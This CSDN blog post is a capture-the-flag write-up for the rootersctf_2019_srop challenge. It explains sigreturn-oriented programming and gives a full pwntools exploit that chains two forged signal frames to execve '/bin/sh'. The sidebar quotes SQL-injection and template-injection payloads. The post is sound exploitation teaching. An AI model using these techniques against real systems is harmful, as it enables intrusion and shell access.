srop学习 rootersctf_2019_srop

最新推荐文章于 2022-03-24 20:17:06 发布
最新推荐文章于 2022-03-24 20:17:06 发布
阅读量496 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/120714498
版权

rootersctf_2019_srop

前置知识

这里有必要讲一下什么是srop。ctf_wiki的描述
这里我也简单说一下我的理解。就是内核处理信号(软中断)的时候,会将寄存器压栈到用户地址空间(这里有点小疑惑,因为内核切换进程的时候压栈是属于到内核地址空间,这里是用户地址空间)然后切换回来的时候,调用rt_sigreturnpop回来之前保存的寄存器等。那么我们只要拥有这个gardet,就可以控制程序执行流以及次奥用的系统调用的参数。而触发pop这些寄存器的方法就是直接调用这个rt_sigreturn即可。

ida分析

在这里插入图片描述
如图所示,只有一个简单的读入的溢出,没有牵涉到别的,甚至是静态编译的。那么只有srop着一种方法。其实这种方法也属于小众的,因为sigreturnframe一般比较大,如果能够用sigreturnframe的,基本上常规溢出也可以getshell,因此单独为了考这个就只能不放libc,而且一定会有pop_rax_syscall的gardet。

exp编写

from pwn import *
# io=process('./rootersctf_2019_srop')
io=remote('node4.buuoj.cn',27052)
context.log_level='debug'
context.arch="amd64"
context.log_level='debug'
data_addr = 0x402000
syscall_leave_ret = 0x401033
pop_rax_syscall_leave_ret = 0x401032
syscall_addr = 0x401046


frame = SigreturnFrame()
frame.rax=0 # read syscall
frame.rdi = 0#stdin
frame.rsi = data_addr#buffer
frame.rdx=0x400#length
frame.rip=syscall_leave_ret
# rbp points to next frame?
# /bin/sh is 8 bytes, data_addr+20(all 'a')and8 bytes's /bin/sh will points to 
# pop_rax...., so will execute leave_return
frame.rbp=data_addr+0x20 


# call read 
data = [0x88*'a', pop_rax_syscall_leave_ret,0xf,bytes(frame)]
# gdb.attach(io,"b *0x401035")
io.recvline()
io.sendline(flat(data))

layout = ["/bin/sh\x00", "a" * 0x20, pop_rax_syscall_leave_ret, 0xf]

frame = SigreturnFrame(kernel="amd64")
frame.rax = 59 # execve 
frame.rdi = data_addr # /bin/sh\x00
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr

layout.append(bytes(frame))

io.sendline(flat(layout))
io.interactive()

注意这里比较难以理解的地方就是,由于没有/bin/sh需要自己读入,因此需要两次srop。第一次为了读入,第二次执行execve。比较难以理解的地方是第一次的sigretframe里面的rbp设置为data+20的位置,这是为了能够直接return的位置放下一个gardet(第二个payload中的pop_rax_syscall_leave_ret),由此连续执行srop。
此外,这个好像没法调试的样子,因为没法陷入内核。

总结

srop属于比较小众的题目,本体的两次srop已经是比较难的了,但是和其他栈题目比起来,还算是比较简单的。远离也不算难,理解了这道题srop应该就没啥问题了。

N1ch0l4s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SROP基本原理和利用
MillionSky的专栏
03-19 6880
1 概述SROP: Sigreturn Oriented Programming ,系统Signal Dispatch之前会将所有寄存器压入栈,然后调用signal handler,signal handler返回时会将栈的内容还原到寄存器。 如果事先填充栈,然后直接调用signal handler,那在返回的时候就可以控制寄存器的值。2 资源1. Framing Signals—A Return...
rootersctf_2019_srop
z1r0的博客
03-10 282
rootersctf_2019_srop 查看保护 栈溢出,这一题没有放libc但是有pop rax syscall leave ret所以可以直接使用srop来解决 攻击思路:两次srop 1.构造read(0, data_addr, 0x400)来读入/bin/sh 2.有了/bin/sh之后使用execve这个函数来执行execve("/bin/sh", 0, 0);使得可以getshell 溢出的大小的话buf为0x80所以64位下就是0x88。具体的srop可以看ctf-wiki 这里的dat
srop学习:【rootersctf_2019_srop
weixin_51055545的博客
03-24 5538
最近学习了一些srop的一些知识,这里通过一道题目来加深一下对srop的运用。 文章目录1.srop的简单介绍2.rootersctf_2019_srop题目例行检查漏洞分析 1.srop的简单介绍 这里推荐大家一篇文章srop SROP全称为Sigreturn Oriented Programming,其攻击核心为通过伪造一个‘Signal Frame’(以下简称sigFrame)在栈上,同时触发sigreturn系统调用,让内核为我们恢复一个sigFrame所描述的进程,如一个shell、一个wrtie
SROP三连击(ciscn_2019_es_7、rootersctf_2019_srop、360chunqiu2017_smallest)
huzai9527的博客
03-25 446
SROP】ciscn_2019_es_7 1. ida 分析 vuln有两个函数,read、write;read函数存在栈溢出,write能够泄露栈上的地址 存在sigreturn的调用 2. 思路 首先泄露栈上的返回地址,然后通过gdb调试,输入的参数与返回地址的偏移 有了参数地址,站地址-偏移,就可以输入/bin/sh且得到它的地址 有了/bin/sh、栈地址、sigreturn、syscall就可以使用SROP 3. exp from pwn import * #p = proces
SROP简单姿势学习-Ciscn_s_3
aptx4869_li的博客
08-06 509
解题思路 安全机制检查 healer@healer-virtual-machine:~/Desktop/ciscn_s_3$ readelf -h ciscn_s_3 ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, lit
MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm
09-24
标题"MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm"涉及到的主要知识点是关于无线通信中的误差性能评估,特别是针对正交频分复用(OFDM)系统。描述提到的是一个基于平均平方误差(Mean Square Error,MSE...
csapplab:学习csapp
04-04
3.28-4.4第一周学习总结: 虽然提纲上让先写csapplab,但上周日csapplab做了一下午,就写了3道,还都得找资料,看别人的思路,难顶。。。 然后这周还是将重点放在了ctf上,不过效率还挺高的,嘿嘿,学了泄露libc的...
信息安全_数据安全_eu-16-Sullivan-Towards-A-Policy-.pdf
08-22
攻击与防御之间的军备竞赛仍在继续,各种新的攻击技术如ROP、SROP、JIT-ROP等不断出现,而防御策略也相应地发展出CFI、ROPGuard、BinCFI等一系列工具。尽管如此,寻找一种既实用又安全的解决方案仍然是一个挑战,这...
带exp的pwn测试文件
09-12
本主题的“带exp的pwn测试文件”是指一系列用于测试和学习漏洞利用技术的文件,其中“exp”代表exploit,即漏洞利用程序。这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc...
politicalhub-api
03-29
自述文件用法列出政治组织GET..., " logo " : " https://aplicaciones007.jne.gob.pe//srop_publico/Consulta/Simbolo/GetSimbolo/2859 " }, { " id " : 18 , " name " : " PERU NACION " , " slug " : " peru-nacion
CTF wiki srop 学习记录
m0_57754423的博客
03-04 345
参考wiki,hollk师傅博客。 说一下我的个人理解,当题目中没有足够的gadget ,可以直接或者间接控制rax,题目中有syscall就可以利用这种攻击手法。 srop: 在unix系统发生signal的时候会执行sigreturn 系统调用。 signal机制: signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般,我们也称其为软中断信号,或者软中断。比如说,进程之间可以通过系统调用 kill 来发送软中断信号。 介绍: 1.内核向某个程序中发送signal机制
BUUCTF pwn rootersctf_2019_xsh
stareforever的博客
02-23 1964
查看保护,基本全开 IDA查看程序 程序读入命令,并通过子函数 run 执行 run函数 对读入的命令进行判断,只能执行ls, echo, zooo指令, 这里可以发现echo 命令存在format string 漏洞, 首先测试可以确定偏移为24 那么整体的思想就是修改程序提供的函数的got表为system@plt,然后再输入内容/bin/sh即可获得shell,目前可以利用的函数为strncmp和strtok函数 首先需要泄露piebase的值,这里介绍覆盖strncmp函数(strtok同理)
SROP 64位-smallest(2017429ctf.ichunqiu)
MillionSky的专栏
03-19 1209
1 概述360春秋杯”国际网络安全挑战赛Challenge - smallest (pwn 300) - 429 ichunqiu ctf 2017http://2017429ctf.ichunqiu.com/competition/index 64位SROP很好的练习题。2 程序分析millionsky@ubuntu-16:~/tmp/smallest$ objdump -d smallest ...
[RootersCTF2019]ImgXweb
qq_45691294的博客
09-28 825
题目里只发现了一个页面和登录注册的功能点 信息搜集并没有得到什么结果,我们先注册一个用户,admin用户显示已注册,注册一个用户名为MOYI的账号 登录成功后发现了一个文件上传的功能点 登陆上后。文件上传。不能传.htaccess类似的。但是php啥的都可以传,不解析 那么应该不是phpweb。java。也不像。估计是python。 然后session应该是jwt加密过的 eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiTU9ZSSJ9.F-ZV3xo
BUUCTF:[RootersCTF2019]babyWeb
末初的CSDN博客
08-02 1538
题目地址:https://buuoj.cn/challenges#[RootersCTF2019]babyWeb SQL查询,过滤了:union、sleep、'、"、or、-、benchmark order by测试字段数,发现当order by 2时返回正常order by 3返回没有这个字段,确定为两个字段,一个为uniqueid另一个应该就是flag 那么应该就是输入id判断登录,即可,尝试万能密码登录:1 || 1=1 limit 0,1 返回flag ...
RootersCTF2019 I ♥ Flask
汗的博客
08-29 481
知识点 url参数爆破、ssti 信息收集 看了别人的wp,才知道http参数这方面的信息收集 这里使用arjun,当然也可以万能的burpsuite python3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get 得到参数name 改成/?name={{3*3}} 利用和get flag 获取当前目录下文件列表 xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').
SROP
weixin_30794499的博客
02-23 289
title: SROP date: 2018-02-21 19:58:12 categories: 栈溢出 tags: - CTF - PWN - 栈溢出 SROP全称为 Sigreturn Oriented Programming ,表明利用sigreturn这个函数实现ROP的技术。 参考资料 http://www.freebuf.com/articles/network/87447.ht...
SROP简单介绍和例题
qq_45595732的博客
03-02 3860
SROP本质是 sigreturn 这个系统调用,主要是将所有寄存器压入栈中,以及压入 signal 信息,以及指向 sigreturn 的系统调用地址。 对于 signal Frame 来说,会因为架构的不同而有所区别,这里给出分别给出 x86 以及 x64 的 sigcontext 。 x86 struct sigcontext { unsigned short gs, __gsh; unsigned short fs, __fsh; unsigned short es, __esh;
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3377
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
srop的基本原理是什么
最新发布
03-03
SROP(Sigreturn-Oriented Programming)是一种利用信号处理函数(signal handler)来执行攻击代码的技术。攻击者通过利用程序中的漏洞,将程序状态中的寄存器值篡改成指向一个虚假的信号处理函数,并且在这个虚假的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值